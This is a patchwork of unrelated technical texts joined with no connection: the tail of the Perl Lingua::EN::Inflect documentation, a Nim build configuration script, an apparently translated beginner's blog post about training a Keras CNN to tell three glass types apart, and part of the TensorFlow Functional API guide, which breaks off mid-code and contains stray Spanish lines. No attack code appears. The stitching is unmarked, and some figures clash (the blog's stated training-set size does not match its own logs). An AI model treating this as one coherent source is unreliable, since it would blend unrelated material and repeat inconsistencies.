When it is imported, Lingua::EN::Inflect executes (as Perl code) the contents of any file named .inflectrc which it finds in the directory where Lingua/EN/Inflect.pm is installed, or in the current home directory ($ENV{HOME}), or in both. Note that the code is executed within the Lingua::EN::Inflect namespace.
Hence the user or the local Perl guru can make appropriate calls to def_noun, def_verb, etc. in one of these .inflectrc files, to permanently and universally modify the behaviour of the module. For example
> cat /usr/local/lib/perl5/Text/Inflect/.inflectrc
def_noun "UNIX" => "UN*X|UNICES";
def_verb "teco" => "teco", # LITERALLY: "to edit with TECO"
"teco" => "teco",
"tecos" => "teco";
def_a "Euler.*"; # "Yewler" TURNS IN HIS GRAVE
Note that calls to the def_... subroutines from within a program will take precedence over the contents of the home directory .inflectrc file, which in turn takes precedence over the system-wide .inflectrc file.
DIAGNOSTICS
On loading, if the Perl code in a .inflectrc file is invalid (syntactically or otherwise), an appropriate fatal error is issued. A common problem is not ending the file with something that evaluates to true (as the five def_... subroutines do).
Using the five def_... subroutines directly in a program may also result in fatal diagnostics, if a (singular) pattern or an interpolated (plural) string is somehow invalid.
Specific diagnostics related to user-defined inflections are:
"Bad user-defined singular pattern:\n\t %s"
The singular form of a user-defined noun or verb (as defined by a call to def_noun, def_verb, def_adj, def_a, or def_an) is not a valid Perl regular expression. The actual Perl error message is also given.
"Bad user-defined plural string: '%s'"
The plural form(s) of a user-defined noun or verb (as defined by a call to def_noun, def_verb, or def_adj) is not a valid Perl interpolated string (usually because it interpolates some undefined variable).
"Bad .inflectrc file (%s):\n %s"
Some other problem occurred in loading the named local or global .inflectrc file. The Perl error message (including the line number) is also given.
There are no diagnosable run-time error conditions for the actual inflection subroutines (except NUMWORDS), and hence no run-time diagnostics. If the inflection subroutines are unable to form a plural via a user definition or an inbuilt rule, they just "guess" the commonest English inflection: adding "-s" for nouns, removing "-s" for verbs, and no inflection for adjectives.
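As an illustrative (untested) sketch of that fallback behaviour:
use Lingua::EN::Inflect qw(PL_N PL_V PL_ADJ);
print PL_N("wug");      # "wugs"   -- unknown noun: add "-s"
print PL_V("glorks");   # "glork"  -- unknown verb: remove "-s"
print PL_ADJ("blue");   # "blue"   -- adjectives are left uninflected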
Lingua::EN::Inflect::NUMWORDS() can die with the following messages:
"Bad grouping option: %s"
The optional argument to NUMWORDS() wasn't 1, 2 or 3.
"Number out of range"
NUMWORDS() was passed a number larger than the number represented by 3006 consecutive nines. The words representing that number are 63,681 characters long, including commas and spaces. If you're interested in the actual value, see t/numwords.t.
The reference for the names is http://en.wikipedia.org/wiki/Names_of_large_numbers
There are no names for any higher numbers.
If a verb has identical 1st and 2nd person singular forms, but different 1st and 2nd person plural forms, then when its plural is constructed, the 2nd person plural form is always preferred.
The author is not currently aware of any such verbs in English, but is not quite arrogant enough to assume ipso facto that none exist.
The singular pronoun "it" presents a special problem because its plural form can vary, depending on its "case". For example:
It ate my homework -> They ate my homework
It ate it -> They ate them
I fed my homework to it -> I fed my homework to them
As a consequence of this ambiguity, PL() and PL_N() have been implemented so that they always return the nominative plural (that is, "they").
However, when asked for the plural of an unambiguously accusative "it" (namely, PL("to it"), PL_N("from it"), PL("with it"), etc.), both subroutines will correctly return the accusative plural ("to them", "from them", "with them", etc.)
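For example, an untested sketch consistent with the behaviour described above:
use Lingua::EN::Inflect qw(PL PL_N);
print PL("it");          # "they"      (nominative assumed)
print PL("to it");       # "to them"   (unambiguously accusative)
print PL_N("with it");   # "with them"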
The rules governing the choice between:
There were no errors.
and
There was no error.
are complex and often depend more on intent than on content. Hence it is infeasible to specify such rules algorithmically.
Therefore, Lingua::EN::Inflect contents itself with the following compromise: if the governing number is zero, inflections always return the plural form unless the appropriate "classical" inflection is in effect, in which case the singular form is always returned.
Thus, the sequence:
NUM(0);
print inflect "There PL(was) NO(choice)";
produces "There were no choices", whereas:
classical 'zero'; # or: classical(zero=>1);
NUM(0);
print inflect "There PL(was) NO(choice)";
prints "There was no choice".
Another context in which intent (and not content) sometimes determines plurality is where two distinct meanings of a word require different plurals. For example:
Three basses were stolen from the band's equipment trailer.
Three bass were stolen from the band's aquarium.
I put the mice next to the cheese.
I put the mouses next to the computers.
Several thoughts about leaving crossed my mind.
Several thought about leaving across my lawn.
Lingua::EN::Inflect handles such words in two ways:
If both meanings of the word are the same part of speech (for example, "bass" is a noun in both sentences above), then one meaning is chosen as the "usual" meaning, and only that meaning's plural is ever returned by any of the inflection subroutines.
If each meaning of the word is a different part of speech (for example, "thought" is both a noun and a verb), then the noun's plural is returned by PL() and PL_N(), and the verb's plural is returned only by PL_V().
Such contexts are, fortunately, uncommon (particularly "same-part-of-speech" examples). An informal study of nearly 600 "difficult plurals" indicates that PL() can be relied upon to "get it right" about 98% of the time (although, of course, ichthyophilic guitarists or cyber-behaviouralists may experience higher rates of confusion).
If the choice of a particular "usual inflection" is considered inappropriate, it can always be reversed with a preliminary call to the corresponding def_... subroutine.
NOTE
I'm not taking any further correspondence on:
"octopi".
Despite the populist pandering of certain New World dictionaries, the plural is "octopuses" or (for the pedantic classicist) "octopodes". The suffix "-pus" is Greek, not Latin, so the plural is "-podes", not "pi".
"virus".
Had no plural in Latin (possibly because it was a mass noun). The only plural is the Anglicized "viruses".
AUTHOR
Damian Conway (damian@conway.org)
BUGS AND IRRITATIONS
The endless inconsistencies of English.
(Please report words for which the correct plural or indefinite article is not formed, so that the reliability of Lingua::EN::Inflect can be improved.)
COPYRIGHT
Copyright (c) 1997-2009, Damian Conway. All Rights Reserved.
This module is free software. It may be used, redistributed
and/or modified under the same terms as Perl itself.
from macros import error
type Compiler = enum gcc = "gcc", clang = "clang"
var cross {.used.} = false
proc setCompiler(s: string, compiler = gcc, cpp = false) {.used.} =
let c = findExe s
let cpp = (if cpp: ".cpp" else: "")
if c.len == 0:
error s & " binary wasn't found in $PATH."
switch $compiler & cpp & ".exe", c
switch $compiler & cpp & ".linkerexe", c
when defined(musl):
setCompiler "x86_64-linux-musl-gcc"
switch "passL", "-static"
elif defined(x86):
cross = true
setCompiler "i686-pc-linux-gnu-gcc"
switch "cpu", "i386"
switch "passL", "--sysroot=/usr/i686-pc-linux-gnu/"
elif defined(arm):
cross = true
switch "cpu", "arm"
switch "passL", "--sysroot=/usr/arm-linux-gnueabihf/"
elif defined(wasm):
cross = true
let linkerOptions = "-nostdlib -Wl,--no-entry,--allow-undefined,--gc-sections,--strip-all"
switch "o", projectName() & ".wasm"
switch "cpu", "i386"
switch "cc", "clang"
switch "d", "danger"
switch "opt", "size"
switch "stackTrace", "off"
switch "nomain"
switch "d", "nimNoLibc"
switch "d", "noSignalHandler"
switch "passC", "--target=wasm32-unknown-unknown-wasm"
switch "passC", "-mexception-handling"
switch "passC", "-nostdlib"
switch "passL", "--target=wasm32-unknown-unknown-wasm"
switch "clang.options.linker", linkerOptions
switch "clang.cpp.options.linker", linkerOptions
when defined(release) or defined(danger):
switch "excessiveStackTrace", "off"
if not cross:
switch "passC", "-march=native"
switch "passC", "-floop-interchange -ftree-loop-distribution -floop-strip-mine -floop-block"
switch "passC", "-ftree-vectorize"
switch "passC", "-flto"
switch "passL", "-fuse-linker-plugin"
switch "passL", "-s"
when defined(hotcodereloading):
switch "nimcache", "nimcache"
elif defined(danger):
switch "nimcache", "/tmp/nim/" & projectName() & "_d"
elif defined(release):
switch "nimcache", "/tmp/nim/" & projectName() & "_r"
else:
switch "nimcache", "/tmp/nim/" & projectName()
switch "styleCheck", "hint"
switch "verbosity", "2"
I Built an "AI That Classifies Glasses"
Hello! I'm Watanabe, an Aidemy trainee! This time I'm building an image-classification program with a CNN. I was curious whether it could correctly tell apart objects with similar shapes, so I prepared three kinds of glasses that all look roughly alike!
From left to right: a tumbler (highball glass), a shot glass, and a rocks glass. We only distinguish these three here, but if an AI could identify many kinds of glasses, hotels and restaurants might be able to track their glass inventory at all times, and tedious jobs like stocktaking could be handed over to the AI!
Let's work through it in the order of the table of contents!
Table of contents
Environment
Python 3.6.8
jupyter notebook 5.7.4
macOS High Sierra Version 10.13.6
Fetching images with the Flickr API
This time we classify tumblers, shot glasses, and rocks glasses. First, create a folder for each of these names in advance; then use the API of the photo-sharing service Flickr to fetch 400 images per class and save them into the corresponding folders.
from flickrapi import FlickrAPI
from urllib.request import urlretrieve
from pprint import pprint
import os,time, sys
# API keys
key = 'your API key'
secret = 'your secret key'
# Wait 1 second between requests so we don't overload the server or get flagged as spam
wait_time = 1
def get_photos(glass_name):
# Destination folder
savedir = './' + glass_name
# Receive the results as parsed JSON
flickr = FlickrAPI(key, secret, format='parsed-json')
result = flickr.photos.search(
# Search keyword
text = glass_name,
# Number of photos to fetch
per_page = 400,
# Type of media to search for
media = 'photos',
# Sort order of the results
sort = 'relevance',
# Filter out unsafe content
safe_search = 1,
# Extra fields to return
extras = 'url_q, licence'
)
photos = result['photos']
for i, photo in enumerate(photos['photo']):
try:
url_q = photo['url_q']
except:
print('Failed to get the image URL')
continue
# Path to download the image to
filepath = savedir + '/' + photo['id'] + '.jpg'
# Skip if the same file already exists
if os.path.exists(filepath): continue
# Save the image at url_q to filepath
urlretrieve(url_q, filepath)
# Wait 1 second
time.sleep(wait_time)
# Pass each search keyword to get_photos
get_photos('highball glass') # tumbler
get_photos('lowball glass') # rocks glass
get_photos('old fashioned glass') # rocks glass
get_photos('shot glass') # shot glass
Following the article below, I saved 400 images per glass type. Only the rocks glass didn't have enough images, so I collected them under two English terms that both mean "rocks glass" and merged the results into a single folder.
(I worried whether fetching as many as 1,600 images at once was OK, but according to the Flickr API developer guide you're fine as long as you don't make more than 3,600 requests per hour!) Getting this far took about two hours, but it's still far easier than searching for and downloading images by hand. Moments like this make me appreciate how great programming is.
Fetching image data with Python
https://qiita.com/__init__/items/d18dde8c8d186fdc0e3a
Removing images by hand
The saved images include unrelated photos and drawings, shots where the glass is barely visible, photos taken from directly above, and so on, so I delete all of those! With 1,600 images in total it's a real slog, but I grind through it carefully.
There were many irrelevant photos, and after deleting them each class shrank from 400 images to about 150, but I decided to push ahead with what was left.
The photos below are examples of what I collected. From the left column: tumbler (highball glass), shot glass, rocks glass. Since I couldn't collect as many glass photos as I had hoped, I also kept images with patterned glasses, glasses containing drinks, or several glasses in the frame, as long as the photo was sharp.
Converting the image data to NumPy format
Next, using the photos as they are would make training take a very long time, so following the article below I first convert each image to NumPy format and split the data into a training set and an evaluation set. scikit-learn provides sklearn.model_selection.train_test_split() for splitting data into training and test sets, so I'll use that.
from PIL import Image
import os,glob
import numpy as np
from sklearn import model_selection
classes = ['highball glass', 'lowball glass', 'shot glass']
num_classes = len(classes)
image_size = 50
# Load the images
X = [] # image data
Y = [] # label data
# Loop over each class folder
for index, class_ in enumerate(classes):
photos_dir = './' + class_
# List the .jpg files in the folder
files = glob.glob(photos_dir + '/*.jpg')
# Process every image in the folder one by one
for i, file in enumerate(files):
# Stop after 150 images per class
if i >= 150: break
image = Image.open(file)
image = image.convert('RGB')
# Resize the image to 50 x 50
image = image.resize((image_size,image_size))
data = np.asarray(image)
X.append(data)
Y.append(index)
X = np.array(X)
Y = np.array(Y)
# With no arguments the split is 75:25; here we split 70:30.
X_train,X_test,y_train,y_test = model_selection.train_test_split(X,Y,test_size=0.3)
xy = (X_train,X_test,y_train,y_test)
# Save the NumPy arrays to a file
np.save('./glass.npy',xy)
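One small, version-dependent caveat (not mentioned in the original post): the saved object is a tuple of arrays, and NumPy 1.16.3 and later refuse to unpickle object arrays by default, so the later np.load('./glass.npy') call may need an explicit allow_pickle=True:
import numpy as np

# Only needed on NumPy >= 1.16.3, where pickle-based loading is disabled by default.
X_train, X_test, y_train, y_test = np.load('./glass.npy', allow_pickle=True)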
I split the data 7:3 into training and evaluation sets! With this few images I'm a little worried whether it will classify properly...
len(X_train) # training data: 315 images
len(X_test) # evaluation data: 135 images
How to convert image data to NumPy format
https://newtechnologylifestyle.net/%E7%94%BB%E5%83%8F%E3%83%87%E3%83%BC%E3%82%BF%E3%81%8B%E3%82%89numpy%E5%BD%A2%E5%BC%8F%E3%81%AB%E5%A4%89%E6%8F%9B%E3%81%99%E3%82%8B%E6%96%B9%E6%B3%95/
Building, training, and evaluating the model
I use a CNN: build the model, then train and evaluate it! For the architecture I referred to the following Keras image-classification example. https://github.com/keras-team/keras/blob/master/examples/cifar10_cnn.py
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras.utils import np_utils
import numpy as np
import keras
classes = ['highball glass', 'lowball glass', 'shot glass']
num_classes = len(classes)
image_size = 50
# Define the main function
def main():
X_train,X_test,y_train,y_test = np.load('./glass.npy')
# Normalize the pixel values
X_train = X_train.astype('float') / 256
X_test = X_test.astype('float') / 256
# One-hot encode the labels
y_train = np_utils.to_categorical(y_train,num_classes)
y_test = np_utils.to_categorical(y_test,num_classes)
model = model_train(X_train,y_train)
model_eval(model,X_test,y_test)
def model_train(X,y):
model = Sequential()
model.add(Conv2D(32,(3,3), padding='same',input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32,(3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Conv2D(64,(3,3),padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64,(3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(3))
model.add(Activation('softmax'))
# Optimizer
opt = keras.optimizers.rmsprop(lr=0.0001,decay=1e-6)
# Compile the model
model.compile(loss='categorical_crossentropy',
optimizer=opt,metrics=['accuracy'])
# Train the model
model.fit(X, y, batch_size=32,epochs=100)
# Save the model
model.save('./glass_cnn.h5')
return model
# Evaluate the model
def model_eval(model,X,y):
scores = model.evaluate(X,y,verbose=1)
print('Test Loss: ', scores[0])
print('Test Accuracy: ', scores[1])
if __name__ == '__main__':
main()
Epoch 95/100
337/337 [==============================] - 4s 13ms/step - loss: 0.0850 - acc: 0.9852
Epoch 96/100
337/337 [==============================] - 5s 16ms/step - loss: 0.1004 - acc: 0.9703
Epoch 97/100
337/337 [==============================] - 4s 13ms/step - loss: 0.0624 - acc: 0.9881
Epoch 98/100
337/337 [==============================] - 4s 12ms/step - loss: 0.0834 - acc: 0.9733
Epoch 99/100
337/337 [==============================] - 4s 12ms/step - loss: 0.1008 - acc: 0.9792
Epoch 100/100
337/337 [==============================] - 3s 10ms/step - loss: 0.0655 - acc: 0.9911
113/113 [==============================] - 1s 6ms/step
Test Loss: 0.9943334302016064
Test Accuracy: 0.6725663748462644
The accuracy isn't very high, so I'll try a few things to improve it! First, let's augment the images to increase the amount of data!
Image augmentation
For augmentation I use Keras's ImageDataGenerator. I set rotation_range, horizontal_flip, and vertical_flip so that each image is randomly rotated and flipped, generating 9 new images from every original (the code below also adds small horizontal and vertical shifts).
from PIL import Image
import os,glob
import numpy as np
from sklearn import model_selection
from keras.preprocessing.image import ImageDataGenerator, array_to_img
classes = ['highball glass', 'lowball glass', 'shot glass']
num_classes = len(classes)
# Load the images
X_train = []
X_test = []
Y_train = []
Y_test = []
datagen = ImageDataGenerator(
# Rotate randomly within a range of -20 to 20 degrees.
rotation_range=20,
# Randomly flip images horizontally (left-right).
horizontal_flip=True,
# Randomly flip images vertically (up-down).
vertical_flip=True,
# Randomly shift images horizontally.
width_shift_range=0.1,
# Randomly shift images vertically.
height_shift_range=0.1,
)
# Loop over each class folder
for index, classlabel in enumerate(classes):
photos_dir = './' + classlabel
# List the .jpg files in the folder
files = glob.glob(photos_dir + '/*.jpg')
# Process every image in the folder one by one
for i, file in enumerate(files):
# Stop after 150 images per class
if i >= 150: break
image = Image.open(file)
image = image.convert('RGB')
# Resize the image to 50 x 50
image = image.resize((50, 50))
# Convert the image to an array
data = np.asarray(image)
# We only want to augment the training data,
# so set aside the test data before augmenting.
if i < 45:
X_test.append(data)
Y_test.append(index)
continue
# Reshape the remaining data from a 3-D to a 4-D array
data = data.reshape((1,) + data.shape)
# Generate 9 augmented images
g = datagen.flow(data, batch_size=1)
for i in range(9):
batches = g.next()
g_img = batches[0].astype(np.uint8)
X_train.append(g_img)
Y_train.append(index)
X_train = np.array(X_train)
X_test = np.array(X_test)
y_train = np.array(Y_train)
y_test = np.array(Y_test)
xy = (X_train,X_test,y_train,y_test)
np.save('./glass_augment.npy',xy)
For the parameters that ImageDataGenerator accepts, I referred to this page.
Training and evaluating the model again
I train again with 50 epochs.
1575/1575 [==============================] - 16s 10ms/step - loss: 0.6694 - acc: 0.7314
Epoch 45/50
1575/1575 [==============================] - 15s 9ms/step - loss: 0.6439 - acc: 0.7289
Epoch 46/50
1575/1575 [==============================] - 15s 10ms/step - loss: 0.6475 - acc: 0.7333
Epoch 47/50
1575/1575 [==============================] - 15s 10ms/step - loss: 0.6073 - acc: 0.7568
Epoch 48/50
1575/1575 [==============================] - 16s 10ms/step - loss: 0.5976 - acc: 0.7638
Epoch 49/50
1575/1575 [==============================] - 15s 10ms/step - loss: 0.5947 - acc: 0.7568
Epoch 50/50
1575/1575 [==============================] - 15s 10ms/step - loss: 0.5790 - acc: 0.7689
135/135 [==============================] - 1s 8ms/step
Test Loss: 0.7299521702307242
Test Accuracy: 0.696296297620844
After augmentation the accuracy went up by a few percentage points. I also tried raising the number of epochs to 100, but while the training accuracy got close to 100%, the test accuracy was only 66%. In that case the model most likely failed to generalize and overfit; 100 epochs was probably too many for this amount of data. I'll stick with 50 epochs.
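One way to avoid hand-tuning the epoch count (not something the original post does) would be to hold out part of the training data for validation and stop automatically once the validation loss stops improving, for example with Keras's EarlyStopping callback. A minimal sketch, assuming the model and X, y from model_train() above:
from keras.callbacks import EarlyStopping

# Illustrative only: keep 20% of the data for validation and stop once
# val_loss has not improved for 5 epochs, restoring the best weights seen.
early_stop = EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)
model.fit(X, y,
          batch_size=32,
          epochs=100,
          validation_split=0.2,
          callbacks=[early_stop])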
Displaying the confusion matrix as a heatmap
Imitating the example below, I display the confusion matrix as a heatmap to see what kinds of mistakes are most common when classifying the test data!
import pandas as pd
import seaborn as sns
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
# y_true -> true labels, y_pred -> predicted labels
def print_cmx(y_true, y_pred):
labels = sorted(list(set(y_true)))
cmx_data = confusion_matrix(y_true, y_pred, labels=labels)
labels = ['highball glass', 'lowball glass', 'shot glass']
df_cmx = pd.DataFrame(cmx_data, index=labels, columns=labels)
plt.figure(figsize = (10,7))
sns.heatmap(df_cmx, annot=True)
plt.show()
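The post doesn't show the call itself; as a sketch, the heatmap below would come from converting the test-set predictions and the one-hot labels back to class indices and passing them to print_cmx() (model, X_test, and y_test as prepared earlier):
import numpy as np

# Hypothetical glue code: argmax turns probability vectors and one-hot labels
# back into integer class indices before plotting the confusion matrix.
y_pred = np.argmax(model.predict(X_test), axis=1)
y_true = np.argmax(y_test, axis=1)
print_cmx(y_true, y_pred)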
The vertical axis is the predicted class and the horizontal axis is the true class. So among the images predicted as highball glass, 33 were actually highball glasses, 5 were lowball glasses, and 6 were shot glasses.
Looking at this, predictions of shot glass miss a little more often than the others, but overall the model simply misses a lot. I suspected the quality of the original dataset images might be the problem, so I re-screen them. To start with, from all three folders I manually delete the images showing multiple glasses, which I had only kept earlier to pad out the numbers.
Re-screening the dataset and retraining the model
After deleting the images with multiple glasses, the shot glass class shrank to 66 images. The image above shows the shot glass folder.
Then, as before, I split the data 7:3 into training and test sets, augment the images with ImageDataGenerator, and train the model. The ImageDataGenerator parameters are the same as the first time, and I changed the number of epochs to 30.
Evaluating once more
Epoch 25/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.3296 - acc: 0.8810
Epoch 26/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.3239 - acc: 0.8842
Epoch 27/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.3011 - acc: 0.8834
Epoch 28/30
1269/1269 [==============================] - 16s 12ms/step - loss: 0.2863 - acc: 0.8936
Epoch 29/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.2760 - acc: 0.9078
Epoch 30/30
1269/1269 [==============================] - 15s 12ms/step - loss: 0.2545 - acc: 0.9078
54/54 [==============================] - 0s 6ms/step
Test Loss: 0.8330826008761371
Test Accuracy: 0.7962963073341934
The precision still isn't great for a classifier, but the accuracy rose to nearly 80%. By removing the images containing multiple glasses, the accuracy on single glasses improved, and the final model is a full 10 percentage points better than the first one! Even if the amount of data shrinks, I learned that it's important not to compromise on quality and to screen the images properly.
Looking at the confusion matrix, most mistakes were images wrongly classified as shot glasses. The likely reason is that while tumblers and rocks glasses don't resemble each other much, some shot glasses are tall or deep and resemble both of the others, so more images were probably needed for the model to learn the differences between them. I learned that image quality matters enough to make or break the accuracy.
Implementing Grad-CAM
I was curious which features of the glasses the classifier uses to decide, so I try Grad-CAM, which can locate the regions a CNN is focusing on! I implemented it by imitating the blog post below.
Grad-CAM in Keras, with a model you built yourself
https://qiita.com/haru1977/items/45269d790a0ad62604b3
import pandas as pd
import numpy as np
import cv2
from keras import backend as K
from keras.preprocessing.image import array_to_img, img_to_array, load_img
from keras.models import load_model
K.set_learning_phase(1) #set learning phase
def Grad_Cam(input_model, x, layer_name):
# Preprocessing
X = np.expand_dims(x, axis=0)
X = X.astype('float32')
preprocessed_input = X / 255.0
# Compute the predicted class
predictions = model.predict(preprocessed_input)
class_idx = np.argmax(predictions[0])
class_output = model.output[:, class_idx]
# Get the gradients
conv_output = model.get_layer(layer_name).output # output of the layer named layer_name
grads = K.gradients(class_output, conv_output)[0] # gradients(loss, variables) returns the gradients of loss with respect to variables
gradient_function = K.function([model.input], [conv_output, grads]) # a function that maps model.input to (conv_output, grads)
output, grads_val = gradient_function([preprocessed_input])
output, grads_val = output[0], grads_val[0]
# Average the gradients into weights and apply them to the layer output
weights = np.mean(grads_val, axis=(0, 1))
cam = np.dot(output, weights)
# Turn the map into a heatmap image and blend it with the original
cam = cv2.resize(cam, (50,50), cv2.INTER_LINEAR) # resize back to the input size (50 x 50 here)
cam = np.maximum(cam, 0)
cam = cam / cam.max()
jetcam = cv2.applyColorMap(np.uint8(255 * cam), cv2.COLORMAP_JET) # apply a pseudo-color map to the grayscale heatmap
jetcam = cv2.cvtColor(jetcam, cv2.COLOR_BGR2RGB) # convert BGR to RGB
jetcam = (np.float32(jetcam) + x / 2) # blend with the original image
return jetcam
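The post doesn't show how the function is invoked; a hypothetical usage (the file path and layer name below are placeholders) might look like this:
import numpy as np
import matplotlib.pyplot as plt
from keras.models import load_model
from keras.preprocessing.image import load_img, img_to_array

# Placeholder names: any 50 x 50 test image and the last convolutional
# layer reported by model.summary() for the trained model.
model = load_model('./glass_cnn.h5')
x = img_to_array(load_img('./shot glass/example.jpg', target_size=(50, 50)))
cam = Grad_Cam(model, x, 'conv2d_4')
plt.imshow(np.uint8(np.clip(cam, 0, 255)))
plt.show()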
I took a few images from each class and ran them through! On the left is the original image and on the right is where the classifier is looking; the redder a region, the more attention it gets.
For the shot glasses, the impression is that the model looks mostly at the rim and the base! Shot glasses do tend to have thicker bottoms than other glasses, so maybe that's what it picked up on. In the second image it seems to treat the glass's shadow as its base.
In the fourth image an empty area above the glass lights up red and I can't tell what it's reacting to; it might be related to the fact that many of my photos were taken from diagonally above.
For the rocks glasses it looks at the left side and the base of the glass! In the third image the glass fills the center of the frame, yet the model reacts to the background. In the fourth it's even looking at what appears to be a woman's hand and chest. I guess the model is a boy.
Whereas shot glasses and rocks glasses are judged by their bases, the tumbler seems to be judged mainly by what's inside the glass! I included several photos with lemon or orange garnishes, but the model doesn't seem to react to those at all.
Impressions
Actually building something like this teaches you a huge amount, because every time a question comes up you go and look it up. Looking back, I spent far more time reading other people's articles and researching than actually writing code.
I still have plenty of questions and things I want to try, so I'd like to build something again!
Setup
import tensorflow as tf
tf.keras.backend.clear_session() # Simple reset
Introduction
You're already familiar with using keras.Sequential() to create models. The Functional API is a way to create models that are more flexible than Sequential: it can handle models with non-linear topology, models with shared layers, and models with multiple inputs or outputs.
It's based on the idea that a deep learning model is usually a directed acyclic graph (DAG) of layers. The Functional API is a set of tools for building graphs of layers.
Consider the following model:
(input: 784-dimensional vectors)
↧
[Dense (64 units, relu activation)]
↧
[Dense (64 units, relu activation)]
↧
[Dense (10 units, softmax activation)]
↧
(output: probability distribution over 10 classes)
It's a simple graph of three layers.
To build this model with the Functional API, you would start by creating an input node:
from tensorflow import keras
inputs = keras.Input(shape=(784,))
Here we just specify the shape of our data: 784-dimensional vectors. Note that the batch size is always omitted; we only specify the shape of each sample. For an image-type input of shape (32, 32, 3) it would have been:
img_inputs = keras.Input(shape=(32, 32, 3))
What gets returned, inputs, contains information about the shape and dtype of the data you expect to feed to your model:
inputs.shape
TensorShape([None, 784])
inputs.dtype
tf.float32
You can create a new node in the graph of layers by calling a layer on this inputs object:
from tensorflow.keras import layers
dense = layers.Dense(64, activation='relu')
x = dense(inputs)
La acción "layer call" es como dibujar una flecha desde "entradas" a la capa que creamos.Estamos "pasando" las entradas a la capa dense, y afuera obtenemosx.
Agreguemos algunas capas más a nuestro gráfico de capas:
La acción "llamada a la capa" es como dibujar una flecha de "entradas" a la capa que creamos.
Estamos pasando las entradas a una capa mas densa, y respecto a la salida obtenemos una x.
x = layers.Dense(64, activation='relu')(x)
outputs = layers.Dense(10, activation='softmax')(x)
At this point, we can create a Model by specifying its inputs and outputs in the graph of layers:
model = keras.Model(inputs=inputs, outputs=outputs)
To recap, this is our full model definition:
inputs = keras.Input(shape=(784,), name='img')
x = layers.Dense(64, activation='relu')(inputs)
x = layers.Dense(64, activation='relu')(x)
outputs = layers.Dense(10, activation='softmax')(x)
model = keras.Model(inputs=inputs, outputs=outputs, name='mnist_model')
Let's check out what the model summary looks like:
model.summary()
Model: "mnist_model" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 784)] 0 _________________________________________________________________ dense_3 (Dense) (None, 64) 50240 _________________________________________________________________ dense_4 (Dense) (None, 64) 4160 _________________________________________________________________ dense_5 (Dense) (None, 10) 650 ================================================================= Total params: 55,050 Trainable params: 55,050 Non-trainable params: 0 _________________________________________________________________
We can also plot the model as a graph:
keras.utils.plot_model(model, 'my_first_model.png')
And, optionally, display the input and output shape of each layer in the plotted graph:
keras.utils.plot_model(model, 'my_first_model_with_shape_info.png', show_shapes=True)
This figure and the code we wrote are virtually identical. In the code version, the connection arrows are simply replaced by the call operation.
A "graph of layers" is a very intuitive mental image for a deep learning model, and the Functional API is a way to create models that closely mirror this mental image.
Training, evaluation, and inference
Training, evaluation, and inference work exactly the same way for models built with the Functional API as for Sequential models.
Here's a quick demonstration.
Here we load MNIST image data, reshape it into vectors, fit the model on the data (while monitoring performance on a validation split), and finally evaluate the model on the test data:
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
x_train = x_train.reshape(60000, 784).astype('float32') / 255
x_test = x_test.reshape(10000, 784).astype('float32') / 255
model.compile(loss='sparse_categorical_crossentropy',
optimizer=keras.optimizers.RMSprop(),
metrics=['accuracy'])
history = model.fit(x_train, y_train,
batch_size=64,
epochs=5,
validation_split=0.2)
test_scores = model.evaluate(x_test, y_test, verbose=2)
print('Test loss:', test_scores[0])
print('Test accuracy:', test_scores[1])
Epoch 1/5 750/750 [==============================] - 2s 2ms/step - loss: 0.3558 - accuracy: 0.8995 - val_loss: 0.1930 - val_accuracy: 0.9440 Epoch 2/5 750/750 [==============================] - 2s 2ms/step - loss: 0.1724 - accuracy: 0.9482 - val_loss: 0.1452 - val_accuracy: 0.9563 Epoch 3/5 750/750 [==============================] - 2s 2ms/step - loss: 0.1251 - accuracy: 0.9624 - val_loss: 0.1184 - val_accuracy: 0.9656 Epoch 4/5 750/750 [==============================] - 2s 2ms/step - loss: 0.0997 - accuracy: 0.9705 - val_loss: 0.1127 - val_accuracy: 0.9668 Epoch 5/5 750/750 [==============================] - 2s 2ms/step - loss: 0.0824 - accuracy: 0.9756 - val_loss: 0.1073 - val_accuracy: 0.9698 313/313 - 0s - loss: 0.1017 - accuracy: 0.9701 Test loss: 0.1017443984746933 Test accuracy: 0.9700999855995178
For a complete guide to model training and evaluation, see the Guide to training and evaluation.
Saving and serialization
Saving and serialization work exactly the same way for models built with the Functional API as for Sequential models.
A standard way to save a Functional model is to call model.save() to save the whole model into a single file. You can later recreate the same model from this file, even if you no longer have access to the code that created it.
This file includes:
The model's architecture
The model's weight values (which were learned during training)
The model's training config (what you passed to compile), if any
The optimizer and its state, if any (this lets you restart training where you left off)
model.save('path_to_my_model.h5')
del model
# Recreate the exact same model from the file:
model = keras.models.load_model('path_to_my_model.h5')
For a complete guide to saving models, see the Guide to saving and serializing models.
Using the same graph of layers to define multiple models
In the Functional API, models are created by specifying their inputs and outputs in a graph of layers. That means a single graph of layers can be used to generate multiple models.
In the example below, we use the same stack of layers to instantiate two models: an encoder model that turns image inputs into 16-dimensional vectors, and an end-to-end autoencoder model for training.
encoder_input = keras.Input(shape=(28, 28, 1), name='img')
x = layers.Conv2D(16, 3, activation='relu')(encoder_input)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.Conv2D(16, 3, activation='relu')(x)
encoder_output = layers.GlobalMaxPooling2D()(x)
encoder = keras.Model(encoder_input, encoder_output, name='encoder')
encoder.summary()
x = layers.Reshape((4, 4, 1))(encoder_output)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
x = layers.Conv2DTranspose(32, 3, activation='relu')(x)
x = layers.UpSampling2D(3)(x)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
